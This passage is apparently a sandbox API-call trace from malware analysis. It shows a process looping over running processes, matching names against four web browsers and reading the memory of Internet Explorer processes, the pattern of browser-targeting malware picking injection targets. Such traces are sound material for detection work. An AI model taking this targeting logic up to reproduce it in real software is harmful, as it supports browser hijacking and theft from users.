	[0230.849] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.850] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0230.851] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x693c
	[0230.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.851] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0230.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.851] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.852] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0230.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.853] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.853] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0230.854] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x6940
	[0230.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.854] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0230.855] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.855] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.855] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.855] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0230.856] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.856] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.856] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0230.857] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x6944
	[0230.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.857] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0230.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.857] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0230.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.858] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0230.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.858] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.858] NtQueryInformationProcess (in: ProcessHandle=0x6944, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0230.858] ReadProcessMemory (in: hProcess=0x6944, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0230.858] ReadProcessMemory (in: hProcess=0x6944, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0230.859] ReadProcessMemory (in: hProcess=0x6944, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0230.859] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0230.859] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0230.860] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x6948
	[0230.860] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.860] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0230.860] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.860] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0230.860] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.860] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0230.860] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.861] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.861] NtQueryInformationProcess (in: ProcessHandle=0x6948, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0230.861] ReadProcessMemory (in: hProcess=0x6948, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0230.861] ReadProcessMemory (in: hProcess=0x6948, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0230.861] ReadProcessMemory (in: hProcess=0x6948, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0230.861] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0230.861] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0230.862] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x694c
	[0230.862] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.862] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0230.862] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.862] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.863] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.863] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0230.863] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.863] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.863] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0230.864] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x6950
	[0230.864] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.864] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0230.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.865] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.865] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0230.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.865] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.866] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.867] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x6954
	[0230.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.867] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.867] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.867] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.868] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.868] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.869] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.870] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x6958
	[0230.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.870] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.870] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.871] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.871] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.871] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.872] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x695c
	[0230.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.872] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.873] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.873] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.873] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.874] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0230.874] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x6960
	[0230.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.874] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0230.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.875] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.875] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0230.876] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.876] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.876] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0230.877] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa80) returned 0x6964
	[0230.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.877] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.877] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.877] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.877] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.878] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.878] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.878] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.879] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x6968
	[0230.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.879] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.879] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.879] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.880] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.880] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.880] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.880] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.882] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x696c
	[0230.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.882] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.882] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.882] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.882] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.883] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.883] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.883] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0230.884] CloseHandle (hObject=0x4fd0) returned 1
	[0230.884] Sleep (dwMilliseconds=0x64) 
	[0230.991] GetCurrentProcessId () returned 0x110
	[0230.991] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0230.994] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0230.995] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0230.996] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0230.997] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x6970
	[0230.997] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.997] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0230.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.998] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.998] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0230.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.998] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.999] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0231.000] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x6974
	[0231.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.000] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0231.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.000] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.001] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0231.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.001] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.002] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0231.003] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x6978
	[0231.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.003] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0231.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.003] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.004] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0231.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.004] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.005] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0231.006] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x697c
	[0231.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.006] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0231.007] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.007] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.007] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.007] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0231.007] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.008] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.008] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0231.009] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x6980
	[0231.009] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.009] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0231.009] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.010] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.010] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0231.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.011] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.011] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0231.012] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x6984
	[0231.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.012] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0231.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.013] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.013] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0231.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.014] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.014] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0231.015] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x6988
	[0231.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.015] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0231.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.016] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.016] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0231.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.017] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.017] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0231.018] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x698c
	[0231.018] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.018] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0231.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.019] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.019] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0231.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.019] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.020] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.022] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x6990
	[0231.022] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
